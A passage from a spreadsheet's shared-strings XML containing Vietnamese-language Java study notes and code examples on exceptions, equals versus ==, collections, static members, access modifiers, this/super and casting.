        StringProcessor sp = new StringProcessor();
        sp.process("hello");
        sp.process("world");
        System.out.println("String Processor Result: " + sp.getResult()); // Output: HELLOWORLD
        IntegerProcessor ip = new IntegerProcessor();
        ip.process(10);
        ip.process(20);
        ip.process(30);
        System.out.println("Integer Processor Result: " + ip.getResult()); // Output: 60
    }
}</t>
  </si>
  <si>
    <t>try block:
Chứa đoạn code có khả năng ném ra một hoặc nhiều ngoại lệ.
Nếu một ngoại lệ xảy ra trong khối try, luồng điều khiển sẽ ngay lập tức chuyển đến khối catch phù hợp.
Nếu không có ngoại lệ nào xảy ra, khối catch sẽ bị bỏ qua.
catch block(s):
Ngay sau khối try. Một khối try có thể có nhiều khối catch, mỗi khối xử lý một loại ngoại lệ khác nhau.
Chứa code để xử lý (handle) ngoại lệ đã được bắt.
Khi một ngoại lệ được ném, JVM sẽ tìm kiếm khối catch phù hợp nhất (khớp với kiểu ngoại lệ hoặc kiểu cha của nó) để xử lý.
finally block:
Luôn luôn được thực thi, bất kể có ngoại lệ xảy ra hay không, hay có được bắt hay không.
Được sử dụng để dọn dẹp tài nguyên (ví dụ: đóng file, đóng kết nối cơ sở dữ liệu) để đảm bảo không bị rò rỉ tài nguyên.
Khối finally sẽ được thực thi ngay cả khi có return, break, hoặc continue trong khối try hoặc catch.
Ngoại lệ duy nhất có thể ngăn finally thực thi là System.exit() hoặc một Error nghiêm trọng xảy ra.try {
    // Code có khả năng ném ra ngoại lệ
    // Ví dụ: int result = 10 / 0;
    // Ví dụ: FileReader fr = new FileReader("nonExistentFile.txt");
} catch (ArithmeticException e) {
    // Xử lý ArithmeticException
    System.err.println("Error: Cannot divide by zero! " + e.getMessage());
} catch (FileNotFoundException e) {
    // Xử lý FileNotFoundException
    System.err.println("Error: File not found! " + e.getMessage());
} catch (Exception e) { // Bắt các loại Exception khác
    System.err.println("An unexpected error occurred: " + e.getMessage());
    e.printStackTrace(); // In stack trace để debug
} finally {
    // Code luôn được thực thi, dùng để dọn dẹp tài nguyên
    System.out.println("Finally block executed.");
}</t>
  </si>
  <si>
    <t xml:space="preserve"> Từ khóa throws
Khi một phương thức có thể ném ra một checked exception và bạn không muốn xử lý nó bên trong phương thức đó, bạn phải khai báo ngoại lệ đó bằng từ khóa throws trong chữ ký phương thức.
Điều này "đẩy" trách nhiệm xử lý ngoại lệ lên phương thức gọi (caller method).
Nếu một phương thức gọi phương thức có throws, nó cũng phải try-catch hoặc throws ngoại lệ đó.public class ThrowsExample {
    // Phương thức này khai báo rằng nó có thể ném ra IOException
    public void readFile(String filePath) throws IOException {
        FileReader reader = new FileReader(filePath);
        // ... đọc file ...
        reader.close(); // Đóng tài nguyên
        System.out.println("File " + filePath + " read successfully.");
    }
    public static void main(String[] args) {
        ThrowsExample example = new ThrowsExample();
        try {
            // Phương thức main phải bắt hoặc throws IOException
            example.readFile("myFile.txt");
        } catch (IOException e) {
            System.err.println("An error occurred while reading the file: " + e.getMessage());
            e.printStackTrace();
        } finally {
            System.out.println("Main method's finally block executed.");
        }
    }
}</t>
  </si>
  <si>
    <t>throw từ khóa
Từ khóa throw được sử dụng để ném một đối tượng ngoại lệ một cách tường minh từ một đoạn code.
Bạn có thể ném một ngoại lệ đã tồn tại (ví dụ: new IllegalArgumentException()) hoặc một ngoại lệ tùy chỉnh do bạn tự định nghĩa.public void validateAge(int age) {
    if (age &lt; 0 || age &gt; 150) {
        // Ném một ngoại lệ IllegalArgumentException
        throw new IllegalArgumentException("Age must be between 0 and 150.");
    }
    System.out.println("Age is valid: " + age);
}
public static void main(String[] args) {
    ThrowsExample example = new ThrowsExample();
    try {
        example.validateAge(25);
        example.validateAge(-5); // Lệnh này sẽ ném ngoại lệ
        example.validateAge(100); // Lệnh này sẽ không bao giờ được thực thi
    } catch (IllegalArgumentException e) {
        System.err.println("Validation Error: " + e.getMessage());
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve"> so sánh equals() và toán tử "=="?</t>
  </si>
  <si>
    <t>Toán tử ==
Toán tử == dùng để so sánh hai giá trị (value) hoặc hai địa chỉ bộ nhớ (memory address).
Với các kiểu dữ liệu nguyên thủy (primitive types): == so sánh giá trị thực của chúng.
Ví dụ: int a = 10; int b = 10; thì a == b sẽ trả về true vì giá trị của a và b đều là 10.
Với các đối tượng (objects): == so sánh địa chỉ ô nhớ. Nó kiểm tra xem hai biến có cùng trỏ đến một đối tượng duy nhất trên heap hay không.
Ví dụ: String s1 = new String("hello"); String s2 = new String("hello"); thì s1 == s2 sẽ trả về false vì s1 và s2 là hai đối tượng khác nhau, nằm ở hai vị trí bộ nhớ khác nhau, mặc dù nội dung của chúng giống nhau.</t>
  </si>
  <si>
    <t>Phương thức equals() (được định nghĩa trong lớp Object) dùng để so sánh nội dung của hai đối tượng.
Mặc định, phương thức equals() trong lớp Object có cùng hành vi với ==, tức là nó cũng so sánh địa chỉ bộ nhớ.
Tuy nhiên, hầu hết các lớp trong Java như String, Integer, Date đều đã ghi đè (override) phương thức này để so sánh nội dung.
Ví dụ:
String s1 = new String("hello"); String s2 = new String("hello"); thì s1.equals(s2) sẽ trả về true vì phương thức equals() của lớp String được ghi đè để so sánh nội dung chuỗi.
Object obj1 = new Object(); Object obj2 = new Object(); thì obj1.equals(obj2) sẽ trả về false vì lớp Object không ghi đè phương thức này.</t>
  </si>
  <si>
    <t>class Person {
    String name;
    Person(String name) {
        this.name = name;
    }
}
Person p1 = new Person("Tien");
Person p2 = new Person("Tien");
boolean result = p1.equals(p2); // false      String s1 = new String("hello");
String s2 = new String("hello");
boolean result = s1.equals(s2); // true</t>
  </si>
  <si>
    <t>Tiêu chí Mảng Collection                              tiêu chí	Mảng	Collection
Kích thước	Cố định	Thay đổi linh hoạt
Kiểu dữ liệu	Hỗ trợ cả primitive &amp; object	Chỉ hỗ trợ object
Hiệu suất	Nhanh hơn	Chậm hơn (vì nhiều chức năng)
Chức năng nâng cao	Không	Có (sắp xếp, tìm kiếm, filter...)
Dễ dùng	Đơn giản	Linh hoạt và mạnh hơn</t>
  </si>
  <si>
    <t>Các tiêu chí để phân biệt giữa Mảng (Array) và Collection trong lập trình là:
Mảng (Array)
Kích thước cố định: Một khi đã khai báo, kích thước của mảng không thể thay đổi. Bạn cần xác định số lượng phần tử ngay từ đầu.
Kiểu dữ liệu đồng nhất: Tất cả các phần tử trong mảng phải cùng một kiểu dữ liệu (ví dụ: mảng số nguyên, mảng chuỗi).
Truy cập phần tử: Truy cập phần tử bằng chỉ số (index), bắt đầu từ 0. Việc này rất nhanh chóng và hiệu quả.
Lưu trữ: Các phần tử được lưu trữ liên tục trong bộ nhớ, giúp tối ưu hóa hiệu suất truy cập.
Cú pháp: Thường được biểu diễn bằng dấu ngoặc vuông [] sau tên kiểu dữ liệu hoặc tên biến.
Ví dụ: int[] numbers = new int[5]; (mảng 5 số nguyên), String[] names = {"Alice", "Bob"}; (mảng chuỗi).</t>
  </si>
  <si>
    <t>Tóm lại, mảng là một cấu trúc dữ liệu cơ bản, cố định và hiệu quả cho các tác vụ cần truy cập nhanh và biết trước kích thước. Trong khi đó, collection là một tập hợp các framework và API cung cấp các cấu trúc dữ liệu linh hoạt, mạnh mẽ hơn để quản lý và thao tác với các nhóm đối tượng trong nhiều tình huống khác nhau. Trong thực tế, bạn sẽ sử dụng collection thường xuyên hơn vì tính linh hoạt và các tính năng phong phú mà chúng cung cấp.</t>
  </si>
  <si>
    <t>Collection
Kích thước động: Kích thước của collection có thể thay đổi linh hoạt trong quá trình chạy chương trình. Bạn có thể thêm, xóa phần tử mà không cần quan tâm đến kích thước ban đầu.
Kiểu dữ liệu đa dạng (tùy loại collection): Một số loại collection cho phép lưu trữ các phần tử có kiểu dữ liệu khác nhau (ví dụ: ArrayList trong Java có thể chứa cả số và chuỗi nếu không sử dụng generics), trong khi một số khác lại yêu cầu kiểu dữ liệu đồng nhất (khi sử dụng generics, ví dụ List&lt;String&gt;).
Truy cập phần tử: Cách truy cập phần tử đa dạng hơn, tùy thuộc vào loại collection. Có thể truy cập bằng chỉ số (như List), bằng khóa (như Map), hoặc thông qua lặp (iterator). Việc này có thể chậm hơn so với truy cập bằng chỉ số trong mảng.
Lưu trữ: Các phần tử không nhất thiết phải được lưu trữ liên tục trong bộ nhớ.
Tính năng phong phú: Cung cấp nhiều phương thức tiện ích để thao tác với dữ liệu như thêm, xóa, tìm kiếm, sắp xếp, lọc...
Phân loại: Là một khái niệm trừu tượng, có nhiều loại collection khác nhau được triển khai dưới dạng các cấu trúc dữ liệu cụ thể như:
List (Danh sách): Duy trì thứ tự thêm vào, cho phép trùng lặp. Ví dụ: ArrayList, LinkedList.
Set (Tập hợp): Không duy trì thứ tự, không cho phép trùng lặp. Ví dụ: HashSet, TreeSet.
Map (Ánh xạ/Từ điển): Lưu trữ dữ liệu dưới dạng cặp khóa-giá trị, khóa là duy nhất. Ví dụ: HashMap, TreeMap.
Queue (Hàng đợi): Hoạt động theo nguyên tắc vào trước ra trước (FIFO - First-In, First-Out). Ví dụ: ArrayDeque.
Stack (Ngăn xếp): Hoạt động theo nguyên tắc vào sau ra trước (LIFO - Last-In, First-Out).
Ví dụ: List&lt;Integer&gt; ages = new ArrayList&lt;&gt;(); (danh sách số nguyên có thể thay đổi kích thước), Map&lt;String, String&gt; capitals = new HashMap&lt;&gt;(); (ánh xạ tên quốc gia với thủ đô).</t>
  </si>
  <si>
    <t>Phân biệt &amp; với &amp;&amp;</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Trong phần lớn các trường hợp kiểm tra điều kiện trong lập trình, bạn sẽ sử dụng toán tử </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>&amp;&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> vì tính hiệu quả và khả năng ngăn chặn lỗi tiềm ẩn. Toán tử </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> được dùng chủ yếu khi bạn muốn thực hiện các thao tác trên bit của các số nguyên hoặc trong những trường hợp hiếm hoi bạn thực sự cần cả hai vế của biểu thức boolean phải được đánh giá.</t>
    </r>
  </si>
  <si>
    <t>// Bitwise AND
int x = 5;  // Binary: 0101
int y = 3;  // Binary: 0011
int result = x &amp; y; // Binary: 0001 (Decimal: 1)
System.out.println("Bitwise AND: " + result); // Output: Bitwise AND: 1
// Logical AND (không rút gọn)
int a = 5;
int b = 0;
// Cả (a &gt; 10) VÀ (a / b) &gt; 0 đều sẽ được đánh giá.
// Điều này sẽ gây ra lỗi "java.lang.ArithmeticException: / by zero"
// vì phép chia cho 0 sẽ được thực hiện.
// if (a &gt; 10 &amp; (a / b) &gt; 0) {
//     System.out.println("Cả hai điều kiện đều đúng");
// } else {
//     System.out.println("Một hoặc cả hai điều kiện đều sai");
// }
boolean cond1 = false;
boolean cond2 = true;
boolean finalResult = cond1 &amp; cond2; // cond2 vẫn được đánh giá mặc dù cond1 là false
System.out.println("Logical AND đầy đủ: " + finalResult); // Output: Logical AND đầy đủ: false</t>
  </si>
  <si>
    <t>Biến static (Static Variables / Class Variables)
Mục đích: Để lưu trữ dữ liệu chung cho tất cả các đối tượng của một lớp. Thường dùng cho các hằng số hoặc các giá trị cần được chia sẻ.
Ví dụ:
Biến đếm số lượng đối tượng: Mỗi khi một đối tượng mới được tạo, biến static này có thể tăng lên.
Hằng số: Các giá trị không thay đổi, ví dụ Math.PI trong lớp java.lang.Math hoặc System.out trong lớp java.lang.System.
Cấu hình chung: Một cấu hình nào đó mà tất cả các phần của ứng dụng cần biết.class Student {
    String name;
    int id;
    static String university = "Hanoi University"; // Biến static: Chung cho tất cả sinh viên
    public Student(String name, int id) {
        this.name = name;
        this.id = id;
    }
    void display() {
        System.out.println("Name: " + name + ", ID: " + id + ", University: " + university);
    }
}
public class StaticVariableDemo {
    public static void main(String[] args) {
        Student s1 = new Student("Alice", 101);
        Student s2 = new Student("Bob", 102);
        s1.display(); // Name: Alice, ID: 101, University: Hanoi University
        s2.display(); // Name: Bob, ID: 102, University: Hanoi University
        // Có thể truy cập biến static trực tiếp qua tên lớp
        System.out.println("Current University: " + Student.university);
        // Thay đổi biến static sẽ ảnh hưởng đến tất cả các đối tượng
        Student.university = "National University";
        s1.display(); // Name: Alice, ID: 101, University: National University
    }
}</t>
  </si>
  <si>
    <t>Phương thức static (Static Methods / Class Methods)
Mục đích: Để thực hiện các thao tác không cần truy cập dữ liệu của một đối tượng cụ thể. Thường dùng cho các hàm tiện ích (utility functions) hoặc các tác vụ liên quan đến chính lớp.
Ví dụ:
Phương thức tiện ích: Math.sqrt() (tính căn bậc hai), Integer.parseInt() (chuyển đổi chuỗi thành số nguyên).
Phương thức khởi tạo đối tượng phức tạp: Factory methods.
Main method: Phương thức public static void main(String[] args) là điểm bắt đầu của mọi chương trình Java. Nó phải là static vì JVM cần gọi nó mà không cần tạo đối tượng của lớp chứa nó.
Đặc điểm:
Chỉ có thể truy cập các thành viên static khác của cùng lớp.
Không thể truy cập các thành viên "non-static" (instance variables hoặc instance methods) trực tiếp mà không thông qua một đối tượng. Lý do là các thành viên "non-static" chỉ tồn tại khi có đối tượng, trong khi phương thức static có thể được gọi mà không cần đối tượng.
Không thể sử dụng từ khóa this hoặc super (vì this và super ám chỉ một đối tượng cụ thể).
Có thể được gọi trực tiếp bằng TênLớp.tênPhươngThứcStatic().class Calculator {
    static int add(int a, int b) { // Phương thức static
        return a + b;
    }
    static int multiply(int a, int b) { // Phương thức static
        return a * b;
    }
    // int instanceVar = 10; // Biến non-static
    // void instanceMethod() {
    //     System.out.println("This is an instance method.");
    // }
    // Lỗi: Phương thức static không thể truy cập biến non-static trực tiếp
    // static void printInstanceVar() {
    //     System.out.println(instanceVar);
    // }
}
public class StaticMethodDemo {
    public static void main(String[] args) {
        // Gọi phương thức static trực tiếp qua tên lớp
        int sum = Calculator.add(10, 5);
        System.out.println("Sum: " + sum); // Output: Sum: 15
        int product = Calculator.multiply(4, 7);
        System.out.println("Product: " + product); // Output: Product: 28
    }
}</t>
  </si>
  <si>
    <t>Khi nào sử dụng static?
Bạn nên cân nhắc sử dụng static khi:
Dữ liệu/Hành vi chung: Dữ liệu hoặc hành vi đó không phụ thuộc vào trạng thái của bất kỳ đối tượng cụ thể nào, mà là chung cho tất cả các đối tượng (hoặc thuộc về chính lớp).
Hằng số: Định nghĩa các giá trị không đổi.
Phương thức tiện ích: Các hàm tiện ích không cần truy cập dữ liệu đối tượng, ví dụ: các hàm toán học, các hàm chuyển đổi.
Khởi tạo một lần: Cần thực hiện một số thao tác khởi tạo phức tạp chỉ một lần khi lớp được tải.
Factory methods: Các phương thức để tạo và trả về các đối tượng của lớp.Overriding: Phương thức static không thể bị ghi đè (override) trong lớp con. Bạn có thể "hide" (che giấu) một phương thức static trong lớp con bằng cách định nghĩa một phương thức static khác có cùng tên và chữ ký, nhưng đó không phải là override.
Truy cập this và super: Không thể sử dụng this và super trong các phương thức hoặc khối static.
Performance: Mặc dù static có thể giúp quản lý bộ nhớ hiệu quả hơn (chỉ một bản sao), việc lạm dụng static có thể dẫn đến việc khó kiểm soát trạng thái ứng dụng và làm cho việc kiểm thử trở nên khó khăn hơn (do sự phụ thuộc toàn cục).
Hiểu rõ static là một bước quan trọng để viết code Java hiệu quả và đúng đắn.</t>
  </si>
  <si>
    <t>phân biệt lớp và đối tượng</t>
  </si>
  <si>
    <t>Lớp (Class) - Bản thiết kế, Khuôn mẫu
Hãy tưởng tượng một lớp như một bản thiết kế chi tiết hoặc một khuôn mẫu để tạo ra một loại đối tượng nào đó. Nó định nghĩa:
Đặc điểm (Attributes/Properties/Fields): Đây là các dữ liệu mà một đối tượng thuộc lớp đó sẽ có. Chúng giống như các danh từ miêu tả trạng thái của đối tượng.
Ví dụ: Đối với lớp Ôtô, các đặc điểm có thể là màuSắc, sốBánhXe, tốcĐộTốiĐa, hãngSảnXuất.
Hành vi (Behaviors/Methods/Functions): Đây là các hành động mà một đối tượng thuộc lớp đó có thể thực hiện. Chúng giống như các động từ.
Ví dụ: Đối với lớp Ôtô, các hành vi có thể là khởiĐộng(), tăngTốc(), phanhLại(), rẽPhải().
Các điểm chính về Lớp:
Khái niệm trừu tượng: Lớp chỉ là một ý tưởng, một kế hoạch. Bản thân lớp không chiếm bộ nhớ để lưu trữ dữ liệu thực tế cho một đối tượng cụ thể nào.
Không thể tương tác trực tiếp: Bạn không thể "chạy" một lớp. Bạn phải tạo ra một đối tượng từ lớp đó để tương tác với các đặc điểm và hành vi mà nó định nghĩa.
Có thể có nhiều đối tượng từ một lớp: Từ một bản thiết kế (lớp Ôtô), bạn có thể tạo ra vô số chiếc ôtô (đối tượng) khác nhau.// Đây là định nghĩa của một LỚP tên là "Dog"
class Dog {
    // Thuộc tính (đặc điểm) của Dog
    String name;
    String breed;
    int age;
    // Phương thức (hành vi) của Dog
    void bark() {
        System.out.println(name + " says Woof! Woof!");
    }
    void eat() {
        System.out.println(name + " is eating.");
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve"> Đối tượng (Object) - Sản phẩm cụ thể, Thực thể
Một đối tượng là một thực thể cụ thể được tạo ra từ một lớp. Nó là một bản sao "sống" của lớp đó, có dữ liệu riêng và có thể thực hiện các hành vi được định nghĩa trong lớp.
Đặc điểm (Attributes): Mỗi đối tượng sẽ có một bộ dữ liệu riêng cho các đặc điểm được định nghĩa trong lớp.
Ví dụ: Từ lớp Ôtô, bạn có thể tạo ra đối tượng myCar có màuSắc = "Đỏ", sốBánhXe = 4, hãngSảnXuất = "Toyota".
Hành vi (Behaviors): Mỗi đối tượng có thể thực hiện các hành vi được định nghĩa trong lớp, sử dụng dữ liệu riêng của nó.
Ví dụ: myCar.tăngTốc(), friendCar.phanhLại().
Các điểm chính về Đối tượng:
Thực thể cụ thể: Đối tượng là một thực thể vật lý (trong bộ nhớ máy tính) của một lớp.
Chiếm bộ nhớ: Khi một đối tượng được tạo, nó chiếm một phần bộ nhớ để lưu trữ dữ liệu của các thuộc tính riêng của nó.
Có thể tương tác: Bạn có thể gọi các phương thức (hành vi) của đối tượng để thay đổi trạng thái của nó hoặc làm nó thực hiện một hành động.
Tồn tại độc lập: Mỗi đối tượng là độc lập với các đối tượng khác được tạo từ cùng một lớp. Thay đổi trạng thái của một đối tượng không ảnh hưởng đến trạng thái của đối tượng khác (trừ khi chúng chia sẻ các tham chiếu đến cùng một dữ liệu).public class ObjectDemo {
    public static void main(String[] args) {
        // Đây là cách tạo ra các ĐỐI TƯỢNG (instances) từ lớp "Dog"
        Dog myDog = new Dog(); // Tạo đối tượng "myDog"
        Dog yourDog = new Dog(); // Tạo đối tượng "yourDog"
        // Gán giá trị cho các thuộc tính của đối tượng myDog
        myDog.name = "Buddy";
        myDog.breed = "Golden Retriever";
        myDog.age = 3;
        // Gán giá trị cho các thuộc tính của đối tượng yourDog
        yourDog.name = "Lucy";
        yourDog.breed = "Poodle";
        yourDog.age = 5;
        // Gọi các phương thức (hành vi) của đối tượng myDog
        myDog.bark(); // Output: Buddy says Woof! Woof!
        myDog.eat();  // Output: Buddy is eating.
        // Gọi các phương thức (hành vi) của đối tượng yourDog
        yourDog.bark(); // Output: Lucy says Woof! Woof!
    }
}</t>
  </si>
  <si>
    <t>int (Kiểu dữ liệu nguyên thủy - Primitive Type)
Bản chất: Là một kiểu dữ liệu cơ bản, không phải là đối tượng. Nó biểu diễn trực tiếp một giá trị số nguyên 32-bit.int count = 10;
int sum = 20;
int result = count + sum; // Phép toán trực tiếp trên giá trị.       Khi nào nên dùng gì?
Sử dụng int khi bạn chỉ cần lưu trữ một giá trị số nguyên và hiệu suất là yếu tố quan trọng, đặc biệt trong các vòng lặp tính toán lớn.
Sử dụng Integer khi bạn cần một đối tượng (ví dụ: làm việc với Collection Framework), khi bạn cần lưu trữ giá trị null, hoặc khi bạn muốn tận dụng các phương thức được cung cấp bởi lớp Integer.</t>
  </si>
  <si>
    <t>Integer (Lớp bao bọc - Wrapper Class)
Bản chất: Là một lớp đối tượng (class) trong gói java.lang. Mỗi đối tượng Integer bao bọc (wrap) một giá trị int bên trong nó.Có các phương thức: Là một đối tượng, Integer cung cấp nhiều phương thức hữu ích để thao tác, chuyển đổi hoặc so sánh giá trị, ví dụ:
intValue(): Trả về giá trị int của đối tượng Integer.
toString(): Chuyển đổi giá trị Integer thành String.
parseInt(String s): Phương thức static để chuyển đổi String thành int.
valueOf(int i) / valueOf(String s): Phương thức static để chuyển đổi int hoặc String thành đối tượng Integer.Integer num1 = 10; // Autoboxing
Integer num2 = Integer.valueOf("20");
Integer sumObjects = num1 + num2; // Autoboxing và Unboxing diễn ra tự động
ArrayList&lt;Integer&gt; numbers = new ArrayList&lt;&gt;();
numbers.add(5); // Autoboxing: int 5 được chuyển thành Integer đối tượng
int firstNum = numbers.get(0); // Unboxing: Integer đối tượng được chuyển thành int
// Kiểm tra null
Integer nullableInt = null;
// int primitiveInt = nullableInt; // Lỗi: NullPointerException nếu nullableInt là null
if (nullableInt != null) {
    System.out.println(nullableInt * 2);
}</t>
  </si>
  <si>
    <t>Pham vi truy cập private</t>
  </si>
  <si>
    <t>Ý nghĩa: Đây là mức độ truy cập hạn chế nhất.
Phạm vi truy cập: Các thành viên (biến, phương thức, hàm tạo) được khai báo là private chỉ có thể được truy cập từ bên trong chính lớp đó. Chúng không thể được truy cập từ bất kỳ lớp nào khác, kể cả các lớp con hay các lớp trong cùng gói.
Mục đích sử dụng:
Đóng gói dữ liệu: Thường được dùng để ẩn đi các chi tiết triển khai nội bộ của một lớp, bảo vệ dữ liệu khỏi bị thay đổi trực tiếp từ bên ngoài.
Giúp duy trì tính nhất quán: Bạn có thể cung cấp các phương thức public (getter/setter) để kiểm soát việc truy cập và sửa đổi dữ liệu private, đảm bảo tính hợp lệ của dữ liệu.class MyClass {
    private int privateData; // Chỉ MyClass mới có thể truy cập privateData
    private void privateMethod() { // Chỉ MyClass mới có thể gọi privateMethod
        System.out.println("This is a private method.");
    }
}</t>
  </si>
  <si>
    <t>[default] (Package-Private)
Ý nghĩa: Nếu bạn không khai báo bất kỳ từ khóa access modifier nào, đó sẽ là phạm vi truy cập mặc định (default) hay còn gọi là package-private.
Phạm vi truy cập: Các thành viên hoặc lớp có phạm vi default chỉ có thể được truy cập từ bên trong cùng một gói (package). Chúng không thể được truy cập từ các gói khác.
Mục đích sử dụng:
Khi bạn muốn các lớp hoặc thành viên chỉ hiển thị cho các lớp khác trong cùng một nhóm chức năng (cùng gói) mà không cần phải công khai ra toàn bộ ứng dụng.// Trong gói com.example.model
package com.example.model;
class Product { // Lớp Product có phạm vi default
    String productName; // productName có phạm vi default
    void displayInfo() { // displayInfo() có phạm vi default
        System.out.println("Product: " + productName);
    }
}
// Trong cùng gói com.example.model
class ProductManager {
    void manageProduct() {
        Product p = new Product(); // OK, cùng gói
        p.productName = "Laptop";  // OK, cùng gói
        p.displayInfo();           // OK, cùng gói
    }
}
// Trong gói com.example.app (gói khác)
// package com.example.app;
// import com.example.model.Product;
// class MainApp {
//     void run() {
//         Product p = new Product(); // LỖI: Product không public
//     }
// }</t>
  </si>
  <si>
    <t>Phạm vi truy câp public và protect</t>
  </si>
  <si>
    <t xml:space="preserve"> protected
Ý nghĩa: Phạm vi truy cập dành cho các lớp con và các lớp trong cùng gói.
Phạm vi truy cập: Các thành viên được khai báo là protected có thể được truy cập:
Từ bên trong cùng một lớp.
Từ bên trong cùng một gói.
Từ các lớp con (subclasses), ngay cả khi lớp con nằm ở một gói khác.
Mục đích sử dụng:
Cho phép các lớp con kế thừa và tùy chỉnh hành vi của lớp cha, trong khi vẫn giữ một mức độ bảo vệ nhất định cho các thành viên đó khỏi bị truy cập rộng rãi.// Trong gói com.example.base
package com.example.base;
public class Animal {
    protected String species; // protected: truy cập bởi lớp con hoặc cùng gói
    protected void eat() {
        System.out.println(species + " is eating.");
    }
}
// Trong gói com.example.subclass (gói khác)
package com.example.subclass;
import com.example.base.Animal;
public class Dog extends Animal { // Dog là lớp con của Animal
    public Dog(String species) {
        this.species = species; // OK: Truy cập protected field từ lớp con
    }
    public void bark() {
        eat(); // OK: Gọi protected method từ lớp con
        System.out.println(species + " is barking.");
    }
}
// Trong gói com.example.app (gói khác, không phải lớp con)
// package com.example.app;
// import com.example.base.Animal;
// class Zoo {
//     void observe() {
//         Animal a = new Animal();
//         a.species = "Lion"; // LỖI: Không truy cập được protected từ gói khác (không phải lớp con)
//         a.eat();            // LỖI: Không truy cập được protected từ gói khác (không phải lớp con)
//     }
// }</t>
  </si>
  <si>
    <t>public
Ý nghĩa: Đây là mức độ truy cập rộng nhất.
Phạm vi truy cập: Các thành viên (biến, phương thức, hàm tạo) hoặc lớp được khai báo là public có thể được truy cập từ bất kỳ đâu, bên trong hay bên ngoài gói, lớp con hay không phải lớp con.
Mục đích sử dụng:
Cung cấp giao diện công cộng (public API) cho các lớp khác để tương tác với lớp của bạn.
Các phương thức và lớp quan trọng mà bạn muốn người dùng của thư viện/ứng dụng có thể sử dụng.</t>
  </si>
  <si>
    <t>Từ khóa this
Từ khóa this là một biến tham chiếu trỏ tới đối tượng hiện tại. Nó được sử dụng bên trong một phương thức thể hiện (instance method) hoặc một hàm tạo (constructor) để truy cập các thành viên của đối tượng hiện tại, như biến thể hiện (instance variable), phương thức và hàm tạo.</t>
  </si>
  <si>
    <t>public class Student {
    int id;
    String name;
    // Constructor
    public Student(int id, String name) {
        this.id = id; // 'this.id' refers to the instance variable 'id'
        this.name = name; // 'this.name' refers to the instance variable 'name'
    }
    public void display() {
        System.out.println("ID: " + this.id + ", Name: " + this.name);
    }
}public class MyClass {
    void method1() {
        System.out.println("Method 1");
    }
    void method2() {
        this.method1(); // Calling method1 from method2 using 'this'
        System.out.println("Method 2");
    }
}</t>
  </si>
  <si>
    <t>Từ khóa super trong Java được sử dụng để tham chiếu đến đối tượng của lớp cha gần nhất (immediate parent class/superclass). Nó thường được dùng trong ngữ cảnh kế thừa để truy cập các thành viên (biến, phương thức, hàm tạo) của lớp cha bị lớp con ghi đè hoặc che giấu.</t>
  </si>
  <si>
    <t>class Animal {
    String name = "Animal";
}
class Dog extends Animal {
    String name = "Dog";
    void display() {
        System.out.println("Current object name: " + name); // Refers to Dog's name
        System.out.println("Parent object name: " + super.name); // Refers to Animal's name
    }
}class Vehicle {
    void horn() {
        System.out.println("Beep beep!");
    }
}
class Car extends Vehicle {
    @Override
    void horn() {
        super.horn(); // Calls the horn() method of the parent class (Vehicle)
        System.out.println("Car horn!");
    }</t>
  </si>
  <si>
    <t>Upcasting
Định nghĩa: Upcasting là quá trình ép kiểu một đối tượng từ lớp con (subclass) sang lớp cha (superclass). Đây là quá trình tự động (implicit) trong Java, vì lớp con luôn là một dạng của lớp cha (theo nguyên tắc "is-a").
Đặc điểm:
An toàn, không cần ép kiểu tường minh.
Chỉ truy cập được các thành viên (phương thức, thuộc tính) được định nghĩa trong lớp cha hoặc được ghi đè trong lớp con.
Thường được sử dụng khi muốn xử lý đối tượng một cách tổng quát.</t>
  </si>
  <si>
    <t>void makeSound() {
        System.out.println("Some generic animal sound");
    }
}
class Dog extends Animal {
    @Override
    void makeSound() {
        System.out.println("Woof!");
    }
    void fetch() {
        System.out.println("Dog is fetching");
    }
}
public class Main {
    public static void main(String[] args) {
        Dog dog = new Dog();
        // Upcasting: Ép kiểu Dog thành Animal
        Animal animal = dog; // Tự động, không cần ép kiểu tường minh
        animal.makeSound(); // Gọi được: In "Woof!" (phương thức được ghi đè)
        // animal.fetch(); // Lỗi biên dịch: Animal không có phương thức fetch()
    }
}</t>
  </si>
  <si>
    <t>Dog là một lớp con của Animal. Khi Dog được gán cho biến kiểu Animal (upcasting), biến animal chỉ có thể truy cập các phương thức của lớp Animal.
Phương thức makeSound() được ghi đè nên gọi phiên bản của Dog.
Không thể gọi fetch() vì nó chỉ tồn tại trong lớp Dog.</t>
  </si>
  <si>
    <t>Downcasting
Định nghĩa: Downcasting là quá trình ép kiểu một đối tượng từ lớp cha sang lớp con. Đây là quá trình không tự động (explicit) và cần được thực hiện cẩn thận vì có thể gây lỗi nếu đối tượng không thực sự thuộc lớp con.
Đặc điểm:
Không an toàn, cần ép kiểu tường minh bằng cách sử dụng dấu ngoặc (ClassName).
Thường sử dụng toán tử instanceof để kiểm tra xem đối tượng có thuộc lớp con hay không trước khi ép kiểu.
Cho phép truy cập các thành viên cụ thể của lớp con.</t>
  </si>
  <si>
    <t>public class Main {
    public static void main(String[] args) {
        // Upcasting
        Animal animal = new Dog();
        // Downcasting
        if (animal instanceof Dog) {
            Dog dog = (Dog) animal; // Ép kiểu tường minh
            dog.makeSound(); // In "Woof!"
            dog.fetch(); // In "Dog is fetching"
        } else {
            System.out.println("Không thể ép kiểu thành Dog");
        }
        // Trường hợp lỗi downcasting
        Animal genericAnimal = new Animal();
        if (genericAnimal instanceof Dog) {
            Dog dog2 = (Dog) genericAnimal; // Sẽ không chạy vì genericAnimal không phải Dog
        } else {
            System.out.println("genericAnimal không phải là Dog");
        }
    }
}</t>
  </si>
  <si>
